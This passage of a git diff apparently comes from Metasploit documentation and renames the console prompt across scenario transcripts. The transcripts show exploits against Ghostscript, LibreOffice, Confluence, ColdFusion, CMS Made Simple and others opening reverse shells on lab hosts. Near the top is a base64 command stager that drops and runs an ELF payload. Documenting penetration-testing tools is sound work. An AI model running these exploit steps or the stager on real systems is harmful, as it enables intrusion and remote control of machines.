exploit(multi/fileformat/ghostscript_failed_restore) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/fileformat/ghostscript_failed_restore) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set lhost 172.28.128.1 +msf exploit(multi/fileformat/ghostscript_failed_restore) > set lhost 172.28.128.1 lhost => 172.28.128.1 -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set disablepayloadhandler false +msf exploit(multi/fileformat/ghostscript_failed_restore) > set disablepayloadhandler false disablepayloadhandler => false -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set wfsdelay 3600 +msf exploit(multi/fileformat/ghostscript_failed_restore) > set wfsdelay 3600 wfsdelay => 3600 -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set verbose true +msf exploit(multi/fileformat/ghostscript_failed_restore) > set verbose true verbose => true -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run +msf exploit(multi/fileformat/ghostscript_failed_restore) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/hvQlm.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tgxVT' < '/tmp/hvQlm.b64' ; chmod +x '/tmp/tgxVT' ; '/tmp/tgxVT' ; rm -f '/tmp/tgxVT' ; rm -f '/tmp/hvQlm.b64'"] diff --git a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md index e92fcb7c77..bf6e4b05f1 100644 --- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md +++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md @@ -50,7 +50,7 @@ ### LibreOffice 6.2.5 on Windows 10 ``` - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.4:4444 [*] Sending stage (53755 bytes) to 192.168.56.3 @@ -66,7 +66,7 @@ ### LibreOffice 6.2.5 on Ubuntu 18.04 ``` - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (53755 bytes) to 192.168.37.137 @@ -83,9 +83,9 @@ ### LibreOffice 6.2.5 on macOS 10.13.6 ``` - msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp + msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp payload => python/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.4:4444 [*] Sending stage (53755 bytes) to 192.168.56.2 diff --git a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md index 8b9ecdcd00..4a0df2a020 100644 --- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md +++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md @@ -36,18 +36,18 @@ ### Tested on LibreOffice 6.1.2.1 running Windows 7 ``` - msf5 > use exploit/multi/fileformat/libreoffice_macro_exec - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 + msf > use exploit/multi/fileformat/libreoffice_macro_exec + msf exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run + msf exploit(multi/fileformat/libreoffice_macro_exec) > run [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.156 @@ -68,20 +68,20 @@ ### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04 ``` - msf5 > use exploit/multi/fileformat/libreoffice_macro_exec - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1 + msf > use exploit/multi/fileformat/libreoffice_macro_exec + msf exploit(multi/fileformat/libreoffice_macro_exec) > set target 1 target => 1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 + msf exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run + msf exploit(multi/fileformat/libreoffice_macro_exec) > run [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler - msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp + msf exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler + msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set LHOST 192.168.37.1 + msf exploit(multi/handler) > set LHOST 192.168.37.1 LHOST => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (985320 bytes) to 192.168.37.174 diff --git a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md index 21b07b8958..f76900285f 100644 --- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md +++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md @@ -133,12 +133,12 @@ The Agent Tesla CnC username to authenticate with (needed for authenticated RCE ### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): @@ -169,11 +169,11 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633 +msf exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633 LPORT => 6633 -msf5 exploit(multi/http/agent_tesla_panel_rce) > check +msf exploit(multi/http/agent_tesla_panel_rce) > check [+] 169.254.162.16:80 - The target is vulnerable. -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:6633 [*] Executing automatic check (disable AutoCheck to override) @@ -215,16 +215,16 @@ meterpreter > ### WebPanel2.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test +msf exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test +msf exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): @@ -255,7 +255,7 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -296,8 +296,8 @@ meterpreter > ### WebPanel3.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): @@ -328,17 +328,17 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566 +msf exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566 LPORT => 5566 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test +msf exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test +msf exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:5566 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md index 4bb282125b..24defbd7a0 100644 --- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md +++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md @@ -164,22 +164,22 @@ The version of NiFi that was installed on both platforms was 1.12.1. ``` $ msfconsole -q -msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce +msf exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce [*] Using configured payload cmd/unix/reverse_bash -msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set target 1 +msf exploit(multi/http/apache_nifi_processor_rce) > set target 1 target => 1 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 192.168.194.140 +msf exploit(multi/http/apache_nifi_processor_rce) > set rhost 192.168.194.140 rhost => 192.168.194.140 -msf5 exploit(multi/http/apache_nifi_processor_rce) > check +msf exploit(multi/http/apache_nifi_processor_rce) > check [*] 192.168.194.140:8080 - The target appears to be vulnerable. -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Waiting 5 seconds before stopping and deleting [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.140:50008) at 2020-10-03 13:17:58 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions +msf exploit(multi/http/apache_nifi_processor_rce) > sessions Active sessions =============== @@ -195,33 +195,33 @@ It can be seen that it fails the first time because authentication is required, ``` $ msfconsole -q -msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce +msf exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce [*] Using configured payload cmd/unix/reverse_bash -msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1 +msf exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set ssl true +msf exploit(multi/http/apache_nifi_processor_rce) > set ssl true [!] Changing the SSL option's value may require changing RPORT! ssl => true -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rport 9443 +msf exploit(multi/http/apache_nifi_processor_rce) > set rport 9443 rport => 9443 -msf5 exploit(multi/http/apache_nifi_processor_rce) > check +msf exploit(multi/http/apache_nifi_processor_rce) > check [*] 127.0.0.1:9443 - The service is running, but could not be validated. -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [-] Exploit aborted due to failure: bad-config: Authentication is required. Bearer-Token or Username and Password must be specified [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/apache_nifi_processor_rce) > set username admin +msf exploit(multi/http/apache_nifi_processor_rce) > set username admin username => admin -msf5 exploit(multi/http/apache_nifi_processor_rce) > set password admin +msf exploit(multi/http/apache_nifi_processor_rce) > set password admin password => admin -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Waiting 5 seconds before stopping and deleting [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions +msf exploit(multi/http/apache_nifi_processor_rce) > sessions Active sessions =============== diff --git a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md index 1792a63dd1..571b1585fd 100644 --- a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md +++ b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md @@ -74,7 +74,7 @@ if exploitation via the `Import New Language` function succeeded. The default va ## Scenarios ### ATutor 2.2.4 running on Windows 10 (XAMPP) ``` -msf5 exploit(multi/http/atutor_upload_traversal) > show options +msf exploit(multi/http/atutor_upload_traversal) > show options Module options (exploit/multi/http/atutor_upload_traversal): @@ -111,7 +111,7 @@ Exploit target: 0 Auto -msf5 exploit(multi/http/atutor_upload_traversal) > run +msf exploit(multi/http/atutor_upload_traversal) > run [*] Started reverse TCP handler on 192.168.1.28:4444 [+] Successfully authenticated as user 'root'. We have admin privileges! diff --git a/documentation/modules/exploit/multi/http/baldr_upload_exec.md b/documentation/modules/exploit/multi/http/baldr_upload_exec.md index ade572b71f..f2e8ff0cca 100644 --- a/documentation/modules/exploit/multi/http/baldr_upload_exec.md +++ b/documentation/modules/exploit/multi/http/baldr_upload_exec.md @@ -31,10 +31,10 @@ The URI where the Baldr panel/gateway is located on the target web server. ## Scenarios ``` -msf5 > use exploit/multi/http/baldr_upload_exec -msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27 +msf > use exploit/multi/http/baldr_upload_exec +msf exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27 rhost => 192.168.1.27 -msf5 exploit(multi/http/baldr_upload_exec) > run +msf exploit(multi/http/baldr_upload_exec) > run [*] Baldr Version: <= v2.0 [+] Payload uploaded to /logs/FJETBHLL/.vatw.php diff --git a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md index 6fc679448b..b18b34a15a 100644 --- a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md @@ -33,18 +33,18 @@ Affecting CMS Made Simple, version 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.9.1 ### Tested on CMS Made Simple (CMSMS) 2.2.8 ``` -msf5 > use exploit/multi/http/cmsms_object_injection_rce -msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com +msf > use exploit/multi/http/cmsms_object_injection_rce +msf exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com rhosts => target.com -msf5 exploit(multi/http/cmsms_object_injection_rce) > check +msf exploit(multi/http/cmsms_object_injection_rce) > check [*] 192.168.1.64:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/cmsms_object_injection_rce) > set username daniele +msf exploit(multi/http/cmsms_object_injection_rce) > set username daniele username => daniele -msf5 exploit(multi/http/cmsms_object_injection_rce) > set password qwerty +msf exploit(multi/http/cmsms_object_injection_rce) > set password qwerty password => qwerty -msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/ +msf exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/ targeturi => /cmsms/ -msf5 exploit(multi/http/cmsms_object_injection_rce) > exploit +msf exploit(multi/http/cmsms_object_injection_rce) > exploit [*] Started reverse TCP handler on 192.168.1.64:4444 [*] Sending stage (38247 bytes) to 192.168.1.64 @@ -57,5 +57,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.1.64 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/cmsms_object_injection_rce) > +msf exploit(multi/http/cmsms_object_injection_rce) > ``` diff --git a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md index 9a46a406c4..a2ebb149f0 100644 --- a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md @@ -39,18 +39,18 @@ Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, ### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10 ``` -msf5 > use exploit/multi/http/cmsms_showtime2_rce -msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com +msf > use exploit/multi/http/cmsms_showtime2_rce +msf exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/cmsms_showtime2_rce) > check +msf exploit(multi/http/cmsms_showtime2_rce) > check [*] Showtime2 version: 3.6.2 [*] 192.168.2.59:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer +msf exploit(multi/http/cmsms_showtime2_rce) > set username Designer username => Designer -msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r +msf exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r password => d3s1gn3r -msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit +msf exploit(multi/http/cmsms_showtime2_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [*] Showtime2 version: 3.6.2 @@ -66,5 +66,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/cmsms_showtime2_rce) > +msf exploit(multi/http/cmsms_showtime2_rce) > ``` diff --git a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md index c292490032..b209ddb8f1 100644 --- a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md @@ -25,14 +25,14 @@ ### CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9) ``` -msf5 > use exploit/multi/http/cmsms_upload_rename_rce -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev +msf > use exploit/multi/http/cmsms_upload_rename_rce +msf exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev username => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev +msf exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev password => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123 +msf exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123 rhosts => 172.22.222.123 -msf5 exploit(multi/http/cmsms_upload_rename_rce) > run +msf exploit(multi/http/cmsms_upload_rename_rce) > run [*] Started reverse TCP handler on 172.22.222.194:4444 [*] Sending stage (37775 bytes) to 172.22.222.123 @@ -48,14 +48,14 @@ meterpreter > ### CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33) ``` -msf5 > use exploit/multi/http/cmsms_upload_rename_rce -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev +msf > use exploit/multi/http/cmsms_upload_rename_rce +msf exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev username => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev +msf exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev password => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175 +msf exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/http/cmsms_upload_rename_rce) > run +msf exploit(multi/http/cmsms_upload_rename_rce) > run [*] Started reverse TCP handler on 172.22.222.194:4444 [*] Sending stage (37775 bytes) to 172.22.222.175 diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md index e84b7d0ca2..ad27087473 100644 --- a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md +++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md @@ -26,12 +26,12 @@ ColdFusion 2016 (Update 6 and earlier), and ### Tested on Coldfusion 2018 v2018.0.0.310739 ``` -msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 +msf > use exploit/multi/http/coldfusion_ckeditor_file_upload +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 rhosts => 172.22.222.142 -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp... @@ -44,5 +44,5 @@ uname -a Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux exit [*] 172.22.222.142 - Command shell session 1 closed. -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > ``` diff --git a/documentation/modules/exploit/multi/http/confluence_widget_connector.md b/documentation/modules/exploit/multi/http/confluence_widget_connector.md index 775161ddab..8beb7a422b 100644 --- a/documentation/modules/exploit/multi/http/confluence_widget_connector.md +++ b/documentation/modules/exploit/multi/http/confluence_widget_connector.md @@ -33,27 +33,27 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before ## Scenarios ## Tested on Confluence 6.8.2 with Windows target ``` -msf5 > use exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows +msf exploit(multi/http/confluence_widget_connector) > set TARGET Windows TARGET => Windows -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Windows 10 [*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe [*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe @@ -64,7 +64,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target [!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid @@ -73,30 +73,30 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` ## Tested on Confluence 6.8.2 with Java target ``` -msf5 > use exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Linux [*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/EjpPf.jar [*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/EjpPf.jar @@ -105,7 +105,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar [*] target.com:8090 - Waiting for exploit to complete... [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid @@ -114,30 +114,30 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` ## Tested on Confluence 6.8.2 with Linux target ``` -msf5 > use 